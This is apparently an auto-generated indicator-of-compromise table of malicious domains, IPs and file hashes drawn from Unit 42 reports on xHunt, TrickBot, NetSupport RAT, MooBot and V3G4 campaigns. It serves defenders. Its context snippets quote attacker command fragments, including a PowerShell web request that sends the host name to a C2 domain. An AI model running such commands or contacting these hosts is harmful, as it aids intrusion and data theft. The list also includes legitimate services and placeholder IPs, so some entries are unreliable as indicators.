Indicators of compromise
4,116 indicators auto-extracted from article text · hashes, IPs, domains, URLs · verify before use
| Type | Indicator | Context | Article | First seen |
|---|---|---|---|---|
| domain | windows64x.com | er 2019 we observed a host based in Kuwait beaconing to the windows64x[.]com domain using the same DNS tunneling protocol as the CASHY | xHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | windows-updates.com | HY200 PowerShell scripts that communicated with the domains windows-updates[.]com and firewallsupports[.]com , respectively. We do not have | xHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | winx64-microsoft.com | ts seen installing CASHY200, which shows another C2 domain, winx64-microsoft[.]com , used by this threat group. Modified time SHA256 Filenam | xHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection Palo Alto Unit 42 | · Aug 17, 2026 |
| ipv4 | 119.104.111.97 | C2 server answers these two queries with the IPv4 addresses 119.104.111.97 and 109.105.0.0 , which CASHY200 processes by treating each | xHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection Palo Alto Unit 42 | · Aug 17, 2026 |
| ipv4 | 1.2.3.4 | ure 4 shows the DNS server responding to these queries with 1.2.3.4 , which is just a placeholder we included in our C2 server | xHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | eccc65711cbd154f680e8c8ef343d53f29e4a6237510abd4ad1eab5742b035b3 | HY200 DNS Tunneling Protocol We analyzed the file ( SHA256: eccc65711cbd154f680e8c8ef343d53f29e4a6237510abd4ad1eab5742b035b3) in order to understand the capabilities of the payload and | xHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | clementeolmos.com | this blog. Date Observed C2 Trickbot Payload SHA256 11/7/19 clementeolmos[.]com/supp.php erfd1.exe 24e3fa3fb1df9bd70071e5b957d180cd51bcf1 | TrickBot Campaign Uses Fake Payroll Emails to Conduct Phishing Attacks Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | lindaspryinteriordesign.com | 7a938db9eebe4a0efa573343d89703482cafb2d8 Preview_Report.exe lindaspryinteriordesign[.]com/supp.php nfdusdarm.exe 7d6ff8baebedba414c9f15060f0a847096 | TrickBot Campaign Uses Fake Payroll Emails to Conduct Phishing Attacks Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | maisonmarielouise.org | b093e8da7fb666b2d644197fc3ea22b3931a6150c259479b0c 11/19/19 maisonmarielouise[.]org/supp.php SetupDesktop.exe dc8f259fb55a330d1a8e51d91340465 | TrickBot Campaign Uses Fake Payroll Emails to Conduct Phishing Attacks Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | savute.in | nloader C2 Trickbot Payload File SHA256 StatementReport.exe savute[.]in/supp.php nfdsus12.exe d1e0902fd1e8b3951e2aec057a938db9eeb | TrickBot Campaign Uses Fake Payroll Emails to Conduct Phishing Attacks Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 24e3fa3fb1df9bd70071e5b957d180cd51bcf10bab690fa7db7425ca6652c47c | yload SHA256 11/7/19 clementeolmos[.]com/supp.php erfd1.exe 24e3fa3fb1df9bd70071e5b957d180cd51bcf10bab690fa7db7425ca6652c47c e9fd22631de9c918ac834eb14e01c76aa4d33069c7622daafcd03b4f157 | TrickBot Campaign Uses Fake Payroll Emails to Conduct Phishing Attacks Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 7d6ff8baebedba414c9f15060f0a8470965369cbc1088e9f21e2b5289b42a747 | rt.exe lindaspryinteriordesign[.]com/supp.php nfdusdarm.exe 7d6ff8baebedba414c9f15060f0a8470965369cbc1088e9f21e2b5289b42a747 Table 2. Trickbot Payload Download Locations The two payloa | TrickBot Campaign Uses Fake Payroll Emails to Conduct Phishing Attacks Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | b3d2e7158620ece90fbc062892db55bf564c6154eb85facab57a459e3bd1156f | 59fb55a330d1a8e51d913404651b8d785d4ae8c9c655c57b4efbfe71a64 b3d2e7158620ece90fbc062892db55bf564c6154eb85facab57a459e3bd1156f Table 3. Additional Trickbot payloads observed Conclusion B | TrickBot Campaign Uses Fake Payroll Emails to Conduct Phishing Attacks Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | b8c2329906b4712caa0f8ca7941553b3ed6da1cd1f5cb70f1409df5bc1f0ee4a | ing Theme File Name SHA256 Annual bonus StatementReport.exe b8c2329906b4712caa0f8ca7941553b3ed6da1cd1f5cb70f1409df5bc1f0ee4a Payroll Preview_Report.exe f8aaf313cc213258c6976cd55c8c0d04 | TrickBot Campaign Uses Fake Payroll Emails to Conduct Phishing Attacks Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | d1e0902fd1e8b3951e2aec057a938db9eebe4a0efa573343d89703482cafb2d8 | HA256 StatementReport.exe savute[.]in/supp.php nfdsus12.exe d1e0902fd1e8b3951e2aec057a938db9eebe4a0efa573343d89703482cafb2d8 Preview_Report.exe lindaspryinteriordesign[.]com/supp.php n | TrickBot Campaign Uses Fake Payroll Emails to Conduct Phishing Attacks Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | d7687e1d98484b093e8da7fb666b2d644197fc3ea22b3931a6150c259479b0c6 | 2631de9c918ac834eb14e01c76aa4d33069c7622daafcd03b4f1574aad0 d7687e1d98484b093e8da7fb666b2d644197fc3ea22b3931a6150c259479b0c6 dc8f259fb55a330d1a8e51d913404651b8d785d4ae8c9c655c57b4efbfe | TrickBot Campaign Uses Fake Payroll Emails to Conduct Phishing Attacks Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | dc8f259fb55a330d1a8e51d913404651b8d785d4ae8c9c655c57b4efbfe71a64 | 11/19/19 maisonmarielouise[.]org/supp.php SetupDesktop.exe dc8f259fb55a330d1a8e51d913404651b8d785d4ae8c9c655c57b4efbfe71a64 b3d2e7158620ece90fbc062892db55bf564c6154eb85facab57a459e3bd | TrickBot Campaign Uses Fake Payroll Emails to Conduct Phishing Attacks Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | e9fd22631de9c918ac834eb14e01c76aa4d33069c7622daafcd03b4f1574aad0 | a3fb1df9bd70071e5b957d180cd51bcf10bab690fa7db7425ca6652c47c e9fd22631de9c918ac834eb14e01c76aa4d33069c7622daafcd03b4f1574aad0 d7687e1d98484b093e8da7fb666b2d644197fc3ea22b3931a6150c25947 | TrickBot Campaign Uses Fake Payroll Emails to Conduct Phishing Attacks Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | f8aaf313cc213258c6976cd55c8c0d048f61b0f3b196d768fbf51779786b6ac6 | ed6da1cd1f5cb70f1409df5bc1f0ee4a Payroll Preview_Report.exe f8aaf313cc213258c6976cd55c8c0d048f61b0f3b196d768fbf51779786b6ac6 Table 1. Trickbot downloader files Both of these downloader | TrickBot Campaign Uses Fake Payroll Emails to Conduct Phishing Attacks Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | 6google.com | update[.]top) 192.99.138[.]6 4/14/2019 - 5/4/2019 Sakabota (6google[.]com) 104.168.136[.]161 6/24/2019 Newly identified DNS redirec | xHunt Campaign: New Watering Hole Identified for Credential Harvesting Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | alforatsystem.com | activity 213.202.217[.]0,22 6/1/2018, 12/24/2018 Sakabota (alforatsystem[.]com) 213.202.217[.]4 9/8/2018 Sakabota (firewallsupports[.]co | xHunt Campaign: New Watering Hole Identified for Credential Harvesting Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | antivirus-update.top | ed DNS redirect activity 192.99.138[.]4 4/24/2019 Sakabota (antivirus-update[.]top) 192.99.138[.]6 4/14/2019 - 5/4/2019 Sakabota (6google[.] | xHunt Campaign: New Watering Hole Identified for Credential Harvesting Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | cloudipnameserver.com | d DNS Hijacking Activity 185.15.247[.]140 1/14/2017 Oilrig (cloudipnameserver[.]com) 185.15.247[.]140 9/9/2018 Sakabota (sakabota[.]com) 185. | xHunt Campaign: New Watering Hole Identified for Credential Harvesting Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | ffconnectivitycheck.com | /2018 DNSpionage Campaign 185.174.101[.]66 8/6/2018 Oilrig (ffconnectivitycheck[.]com) 185.174.101[.]68 2/14/2019 DNSpionage Campaign 199.247.3 | xHunt Campaign: New Watering Hole Identified for Credential Harvesting Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | firewallsupports.com | ta (alforatsystem[.]com) 213.202.217[.]4 9/8/2018 Sakabota (firewallsupports[.]com) 213.202.217[.]9 11/18/2018 - 11/29/2018 Oilrig (googie[. | xHunt Campaign: New Watering Hole Identified for Credential Harvesting Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | googie.email | orts[.]com) 213.202.217[.]9 11/18/2018 - 11/29/2018 Oilrig (googie[.]email) 91.132.139[.]200 4/16/2019, 5/12/2019 Newly identified D | xHunt Campaign: New Watering Hole Identified for Credential Harvesting Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | google-update.com | date[.]com) 104.168.244[.]213 7/15/2019 - 7/18/2019 Hisoka (google-update[.]com) Additional Resources xHunt Campaign: xHunt Actor’s Cheat | xHunt Campaign: New Watering Hole Identified for Credential Harvesting Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | learn-service.com | eferenced the domain microsofte-update[.]com but changed to learn-service[.]com in December 2019. As of January 2020, this image is no lo | xHunt Campaign: New Watering Hole Identified for Credential Harvesting Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | lowconnectivity.com | 2018 DNSpionage Campaign 185.161.211[.]86 10/4/2018 Oilrig (lowconnectivity[.]com) 185.161.209[.]147 11/28/2018 Widespread DNS Hijacking Ac | xHunt Campaign: New Watering Hole Identified for Credential Harvesting Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | microsofte-update.com | ure. Beginning in May 2019, the image referenced the domain microsofte-update[.]com but changed to learn-service[.]com in December 2019. As o | xHunt Campaign: New Watering Hole Identified for Credential Harvesting Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | sakabota.com | resolution of interest is with the Sakabota related domain sakabota[.]com . This domain resolved to the IP address 185.15.247[.]140 | xHunt Campaign: New Watering Hole Identified for Credential Harvesting Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | zombsroyale.io | Activity 199.247.3[.]186 - 198 5/6/2018 - 8/30/2018 Chafer (zombsroyale[.]io) 213.202.217[.]31 7/6/2018 Newly identified DNS redirect | xHunt Campaign: New Watering Hole Identified for Credential Harvesting Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | afsasdfa33.xyz | name " #Start-sleep -s 10 Invoke-WebRequest -Uri " http : //afsasdfa33[.]xyz/iplog/lepo.php?hst=$env:computername" $ f = get - content | Cortex XDR™ Detects New Phishing Campaign Installing NetSupport Manager RAT Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | exemsi.com | D22A040A ) was built using an unregistered version from www.exemsi[.]com with the title of MPZMZQYVXO patch version 5.1 . This ver | Cortex XDR™ Detects New Phishing Campaign Installing NetSupport Manager RAT Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | netsupportsoftware.com | entationhost.exe ) is started, it beacons to the domain geo.netsupportsoftware[.]com to retrieve geolocation of the host followed by an HTTP P | Cortex XDR™ Detects New Phishing Campaign Installing NetSupport Manager RAT Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | protonmail.com | or print industry. All emails were also sent using a random protonmail[.]com email address and contained email subjects related to ref | Cortex XDR™ Detects New Phishing Campaign Installing NetSupport Manager RAT Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | quickwaysignstx.com | > % temp % \ alpaca . bat &EcHo | s ^ et / p = " http^:^/^/^quickwaysignstx[.]com/view.php " > > % temp % \ alpaca . bat &EcHo | s ^ et / p | Cortex XDR™ Detects New Phishing Campaign Installing NetSupport Manager RAT Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 41d27d53c5d41003bc9913476a3afd3961b561b120ee8bfde327a5f0d22a040a | be downloaded when using msiexec. The MSI payload (SHA256: 41D27D53C5D41003BC9913476A3AFD3961B561B120EE8BFDE327A5F0D22A040A ) was built using an unregistered version from www.exemsi[. | Cortex XDR™ Detects New Phishing Campaign Installing NetSupport Manager RAT Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 68ca2458e0db9739258ce9e22aadd2423002b2cc779033d78d6abec1db534ac2 | e macro code below. The hash for this macro code is SHA256: 68ca2458e0db9739258ce9e22aadd2423002b2cc779033d78d6abec1db534ac2 If the user enters an incorrect password, they are presente | Cortex XDR™ Detects New Phishing Campaign Installing NetSupport Manager RAT Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | e9440a5d2dfe2453ae5b69a9c096f8d4cf9e059d469c5de67380d76e02dd6975 | able macros. The document used for this analysis is SHA256: E9440A5D2DFE2453AE5B69A9C096F8D4CF9E059D469C5DE67380D76E02DD6975 Figure 4. Delivery document disguised as NortonLifeLock. To | Cortex XDR™ Detects New Phishing Campaign Installing NetSupport Manager RAT Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | api.ipify.org | itimate domains may be used during this check: ipecho[.]net api[.]ipify[.]org checkip[.]amazonaws[.]com ip[.]anysrc[.]net wtfismyip[. | Threat Assessment: Ryuk Ransomware Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | checkip.amazonaws.com | y be used during this check: ipecho[.]net api[.]ipify[.]org checkip[.]amazonaws[.]com ip[.]anysrc[.]net wtfismyip[.]com ipinfo[.]io icanhazip | Threat Assessment: Ryuk Ransomware Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | icanhazip.com | azonaws[.]com ip[.]anysrc[.]net wtfismyip[.]com ipinfo[.]io icanhazip[.]com myexternalip[.]com Table 1. Legitimate domains used by Tr | Threat Assessment: Ryuk Ransomware Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | ip.anysrc.net | k: ipecho[.]net api[.]ipify[.]org checkip[.]amazonaws[.]com ip[.]anysrc[.]net wtfismyip[.]com ipinfo[.]io icanhazip[.]com myexternali | Threat Assessment: Ryuk Ransomware Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | ipecho.net | following legitimate domains may be used during this check: ipecho[.]net api[.]ipify[.]org checkip[.]amazonaws[.]com ip[.]anysrc[. | Threat Assessment: Ryuk Ransomware Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | ipinfo.io | checkip[.]amazonaws[.]com ip[.]anysrc[.]net wtfismyip[.]com ipinfo[.]io icanhazip[.]com myexternalip[.]com Table 1. Legitimate do | Threat Assessment: Ryuk Ransomware Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | myexternalip.com | [.]anysrc[.]net wtfismyip[.]com ipinfo[.]io icanhazip[.]com myexternalip[.]com Table 1. Legitimate domains used by Trickbot Anchor_DNS m | Threat Assessment: Ryuk Ransomware Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | wtfismyip.com | i[.]ipify[.]org checkip[.]amazonaws[.]com ip[.]anysrc[.]net wtfismyip[.]com ipinfo[.]io icanhazip[.]com myexternalip[.]com Table 1. L | Threat Assessment: Ryuk Ransomware Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 69ae50160f22494759f89e2b318fe3f1342a87eeeeb4829fefaeafa4a560d57e | 0200 Indicators of Compromise Malicious Web Skimmer SHA256: 69ae50160f22494759f89e2b318fe3f1342a87eeeeb4829fefaeafa4a560d57e Acknowledgements We would like to thank Billy Melicher, Ale | Trends in Web Threats: Attackers Were More Active During Holiday Season Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | komaru.today | iguration decode function. After decoding its C2 server vpn.komaru[.]today from configuration, MooBot will send out a message to inf | Mirai Variant MooBot Targeting D Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | wget.sh | ompromised system and renames the binary files to Realtek . wget[.]sh 46BB6E2F80B6CB96FF7D0F78B3BDBC496B69EB7F22CE15EFCAA275F07 | Mirai Variant MooBot Targeting D Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 06fc99956bd2afceebbcd157c71908f8ce9ddc81a830cbe86a2a3f4ff79da5f4 | A226EE541D7A0027C31FF05578E2 MooBot executable file. mipsel 06FC99956BD2AFCEEBBCD157C71908F8CE9DDC81A830CBE86A2A3F4FF79DA5F4 MooBot executable file. sh4 4BFF052C7FBF3F7AD025D7DBAB8BD98 | Mirai Variant MooBot Targeting D Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 188bce5483a9bdc618e0ee9f3c961ff5356009572738ab703057857e8477a36b | 103F74397C46A21697B7D9C0448BE6 MooBot executable file. i686 188BCE5483A9BDC618E0EE9F3C961FF5356009572738AB703057857E8477A36B MooBot executable file. mips 4567979788B37FBED6EEDA02B3C15F | Mirai Variant MooBot Targeting D Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 36dcaf547c212b6228ca5a45a3f3a778271fbaf8e198ede305d801bc98893d5a | mised system, and renames the binary files to Android . arc 36DCAF547C212B6228CA5A45A3F3A778271FBAF8E198EDE305D801BC98893D5A MooBot executable file. arm 88B858B1411992509B0F2997877402D | Mirai Variant MooBot Targeting D Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 3b12aba8c92a15ef2a917f7c03a5216342e7d2626b025523c62308fc799b0737 | 3F7AD025D7DBAB8BD985B6CAC79381EB3F8616BEF98FCB01D871 x86_64 3B12ABA8C92A15EF2A917F7C03A5216342E7D2626B025523C62308FC799B0737 Table 4. MooBot samples. Additional Resources New Mirai Var | Mirai Variant MooBot Targeting D Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 4567979788b37fbed6eeda02b3c15fafe3e0a226ee541d7a0027c31ff05578e2 | 6009572738AB703057857E8477A36B MooBot executable file. mips 4567979788B37FBED6EEDA02B3C15FAFE3E0A226EE541D7A0027C31FF05578E2 MooBot executable file. mipsel 06FC99956BD2AFCEEBBCD157C719 | Mirai Variant MooBot Targeting D Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 46bb6e2f80b6cb96ff7d0f78b3bdbc496b69eb7f22ce15efcaa275f07cfae075 | system and renames the binary files to Realtek . wget[.]sh 46BB6E2F80B6CB96FF7D0F78B3BDBC496B69EB7F22CE15EFCAA275F07CFAE075 The script downloader. It downloads MooBot onto the comprom | Mirai Variant MooBot Targeting D Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 4bff052c7fbf3f7ad025d7dbab8bd985b6cac79381eb3f8616bef98fcb01d871 | E9DDC81A830CBE86A2A3F4FF79DA5F4 MooBot executable file. sh4 4BFF052C7FBF3F7AD025D7DBAB8BD985B6CAC79381EB3F8616BEF98FCB01D871 MooBot executable file. x86_64 4BFF052C7FBF3F7AD025D7DBAB8B | Mirai Variant MooBot Targeting D Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 7123b2de979d85615c35fca99fa40e0b5fbca25f2c7654b083808653c9e4d616 | 82902E538C2F7146C8666192893258 MooBot executable file. arm7 7123B2DE979D85615C35FCA99FA40E0B5FBCA25F2C7654B083808653C9E4D616 MooBot executable file. i586 CC3E92C52BBCF56CCFFB6F6E2942A6 | Mirai Variant MooBot Targeting D Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 72153e51ea461452263dbb8f658bddc8fb82902e538c2f7146c8666192893258 | 49D3014776C1FB527C3B2E3086EBAB MooBot executable file. arm6 72153E51EA461452263DBB8F658BDDC8FB82902E538C2F7146C8666192893258 MooBot executable file. arm7 7123B2DE979D85615C35FCA99FA40E | Mirai Variant MooBot Targeting D Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 88b858b1411992509b0f2997877402d8bd9e378e4e21efe024d61e25b29daa08 | 71FBAF8E198EDE305D801BC98893D5A MooBot executable file. arm 88B858B1411992509B0F2997877402D8BD9E378E4E21EFE024D61E25B29DAA08 MooBot executable file. arm5 D7564C7E6F606EC3A04BE3AC63FDEF | Mirai Variant MooBot Targeting D Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | b7ee57a42c6a4545ac6d6c29e1075fa1628e1d09b8c1572c848a70112d4c90a1 | own in the following table: File Name SHA256 Description rt B7EE57A42C6A4545AC6D6C29E1075FA1628E1D09B8C1572C848A70112D4C90A1 A script downloader. It downloads MooBot onto the compromis | Mirai Variant MooBot Targeting D Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | cc3e92c52bbcf56ccffb6f6e2942a676b3103f74397c46a21697b7d9c0448be6 | BCA25F2C7654B083808653C9E4D616 MooBot executable file. i586 CC3E92C52BBCF56CCFFB6F6E2942A676B3103F74397C46A21697B7D9C0448BE6 MooBot executable file. i686 188BCE5483A9BDC618E0EE9F3C961F | Mirai Variant MooBot Targeting D Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | d7564c7e6f606ec3a04be3ac63fdef2fde49d3014776c1fb527c3b2e3086ebab | 9E378E4E21EFE024D61E25B29DAA08 MooBot executable file. arm5 D7564C7E6F606EC3A04BE3AC63FDEF2FDE49D3014776C1FB527C3B2E3086EBAB MooBot executable file. arm6 72153E51EA461452263DBB8F658BDD | Mirai Variant MooBot Targeting D Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | cloudfusion.me | 1, we can extract the collection server of the web skimmer: cloudfusion[.]me . This web skimmer is simple, yet classic. It checks whet | Trends in Web Threats: Old Web Skimmer Still Active Today Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | misuperblog.com | are traffic based on another similar request to the URL www.misuperblog[.]com/tmz/?sRjPP6ZH=21Ru2Nt5y6IynFa8dNKfckGmLKuTraB2ebSZxsJ3CJw | Trends in Web Threats: Old Web Skimmer Still Active Today Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | voques-tfr.xyz | fb11f468a1f ). They connect to these IPs through the domain voques-tfr[.]xyz . Although this domain is not resolvable anymore, we anal | Trends in Web Threats: Old Web Skimmer Still Active Today Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | yhys93.site | ed JS that triggers several redirects to an adult website ( yhys93[.]site ). Conclusion As we highlighted in this blog, this quarte | Trends in Web Threats: Old Web Skimmer Still Active Today Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 79eedf9c1b974992a4beada1bd6343ecadece0b413acccd4deded4a49a4ad220 | 0200 Indicators of Compromise Malicious Web Skimmer SHA256: 79eedf9c1b974992a4beada1bd6343ecadece0b413acccd4deded4a49a4ad220 992cfcb5790664d02204e5356e3dd6e109f0cba90b8e552598f2afb11f4 | Trends in Web Threats: Old Web Skimmer Still Active Today Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 992cfcb5790664d02204e5356e3dd6e109f0cba90b8e552598f2afb11f468a1f | er malware campaigns, such as the following Trojan (SHA256: 992cfcb5790664d02204e5356e3dd6e109f0cba90b8e552598f2afb11f468a1f ). They connect to these IPs through the domain voques-tfr[ | Trends in Web Threats: Old Web Skimmer Still Active Today Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | js.digestcolect.com | licious domains, including train[.]developfirstline[.]com , js[.]digestcolect[.]com and stat[.]trackstatisticsss[.]com . Figure 11. Deobfus | Trends in Web Threats in CY Q2 2022: Malicious JavaScript Downloaders Are Evolving Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | stat.trackstatisticsss.com | rain[.]developfirstline[.]com , js[.]digestcolect[.]com and stat[.]trackstatisticsss[.]com . Figure 11. Deobfuscated source code of a malicious in | Trends in Web Threats in CY Q2 2022: Malicious JavaScript Downloaders Are Evolving Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | train.developfirstline.com | clicked. We identified several malicious domains, including train[.]developfirstline[.]com , js[.]digestcolect[.]com and stat[.]trackstatisticsss[ | Trends in Web Threats in CY Q2 2022: Malicious JavaScript Downloaders Are Evolving Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | bb38741575706a94cc1a3ab43d445b641b2c225f408d67a76d3302ca1233e122 | 0200 Indicators of Compromise Malicious Web Skimmer SHA256: bb38741575706a94cc1a3ab43d445b641b2c225f408d67a76d3302ca1233e122 Train[.]developfirstline[.]com Js[.]digestcolect[.]com stat | Trends in Web Threats in CY Q2 2022: Malicious JavaScript Downloaders Are Evolving Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | 8x19.com | icators of Compromise Infrastructure Malware C2 comeanalyze.8x19[.]com Malware Host 176.123.9[.]238 198.98.49[.]79 104.244.72[.] | Mirai Variant V3G4 Targets IoT Devices Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 0837de91aa6bd52ef79d744daba4238a5a48a79eb91cb1a727da3e97d5b36329 | 8.49[.]79 104.244.72[.]64 Artifacts Shell Script Downloader 0837de91aa6bd52ef79d744daba4238a5a48a79eb91cb1a727da3e97d5b36329 c32f8df3cb019e83e0ac49ab0462c59ec70733c3d516ade011727408751 | Mirai Variant V3G4 Targets IoT Devices Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 1218da43a62da76927484bca73a3eee53425c54625147f8d01149bcef2f09d1e | 0acc478bf09658a679a4689f34598fe6e92086efe82900242f3cc5b7aec 1218da43a62da76927484bca73a3eee53425c54625147f8d01149bcef2f09d1e 2944db28e4505fc439599dae15b10bf57b7cf6c2597f618f41b99bfc654 | Mirai Variant V3G4 Targets IoT Devices Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 1cf3879d9e93d1ff30ce5ec0f64ff15b1db7d8237160c83efed688d800e5ef12 | 589A53BDEC49C624F3CB2FC8319218DF721F486E2F15F3C07ABED97AAE6 1cf3879d9e93d1ff30ce5ec0f64ff15b1db7d8237160c83efed688d800e5ef12 c5be50880e2b5a8a8d43a5f1fd6f5d36fc665ab9b4031a9b6a4d5222200 | Mirai Variant V3G4 Targets IoT Devices Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 1dc4777dac6dc4e8c650241e211311c4a418a35ebded72fcdd6bcb965ccf918b | 41985c466c131e48b9ba0d1bb80bdb7556c941ee84aa461fe2efbf1e853 1dc4777dac6dc4e8c650241e211311c4a418a35ebded72fcdd6bcb965ccf918b 3e69e8ed741ab39b0914f7e95bf13b2f0ae9f3c1227dcffdea3369e03e8 | Mirai Variant V3G4 Targets IoT Devices Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 210f3f1ffd2ec66a5076a7fea5d83caa8bbcdb0f3bc3bd030c77eded6f4b5d90 | 90f6e4d92b511fcde9a712b1a8405c5333e0ad78a4c676a64b22412e149 210f3f1ffd2ec66a5076a7fea5d83caa8bbcdb0f3bc3bd030c77eded6f4b5d90 73cc00acc478bf09658a679a4689f34598fe6e92086efe82900242f3cc5 | Mirai Variant V3G4 Targets IoT Devices Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 2944db28e4505fc439599dae15b10bf57b7cf6c2597f618f41b99bfc65443c61 | a43a62da76927484bca73a3eee53425c54625147f8d01149bcef2f09d1e 2944db28e4505fc439599dae15b10bf57b7cf6c2597f618f41b99bfc65443c61 4bffc171c0748cc9e3398b1ce8135b125f54f46752768c981c45d3390e8 | Mirai Variant V3G4 Targets IoT Devices Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 31926da5ca004a11c1f46947edb220afe3a53f81cf245b3afae7ea1abaec7c38 | f1be47233b358889d0594c14409309818d86347d September Campaign 31926da5ca004a11c1f46947edb220afe3a53f81cf245b3afae7ea1abaec7c38 eed4690f6e4d92b511fcde9a712b1a8405c5333e0ad78a4c676a64b2241 | Mirai Variant V3G4 Targets IoT Devices Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 3e69e8ed741ab39b0914f7e95bf13b2f0ae9f3c1227dcffdea3369e03e8bb792 | 77dac6dc4e8c650241e211311c4a418a35ebded72fcdd6bcb965ccf918b 3e69e8ed741ab39b0914f7e95bf13b2f0ae9f3c1227dcffdea3369e03e8bb792 b2e4ee94783062658ddf2c41e9acafb401d0f93e3848c027383a5ca1928 | Mirai Variant V3G4 Targets IoT Devices Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 3f3fb70e16d65f5f4b21777b87c9aae6072022c3dfbefd177f37c8aef4a6aeee | a88de9b566ce980a8188674319039d2fbe13b049859f8fe4821c92f9200 3f3fb70e16d65f5f4b21777b87c9aae6072022c3dfbefd177f37c8aef4a6aeee 67379740ed15e8da8604cc1f0ea715c8641674de66e553c461b3ae782a5 | Mirai Variant V3G4 Targets IoT Devices Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 4bffc171c0748cc9e3398b1ce8135b125f54f46752768c981c45d3390e8359a1 | b28e4505fc439599dae15b10bf57b7cf6c2597f618f41b99bfc65443c61 4bffc171c0748cc9e3398b1ce8135b125f54f46752768c981c45d3390e8359a1 b3a17934f6f72941b9a60097ab09228d873a2f8737ee0ea93b08e5f1cc3 | Mirai Variant V3G4 Targets IoT Devices Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 6229041985c466c131e48b9ba0d1bb80bdb7556c941ee84aa461fe2efbf1e853 | 9320f07d7eade9af523297b4bcfd0e0af187272e368e889c988a55ed78e 6229041985c466c131e48b9ba0d1bb80bdb7556c941ee84aa461fe2efbf1e853 1dc4777dac6dc4e8c650241e211311c4a418a35ebded72fcdd6bcb965cc | Mirai Variant V3G4 Targets IoT Devices Palo Alto Unit 42 | · Aug 17, 2026 |
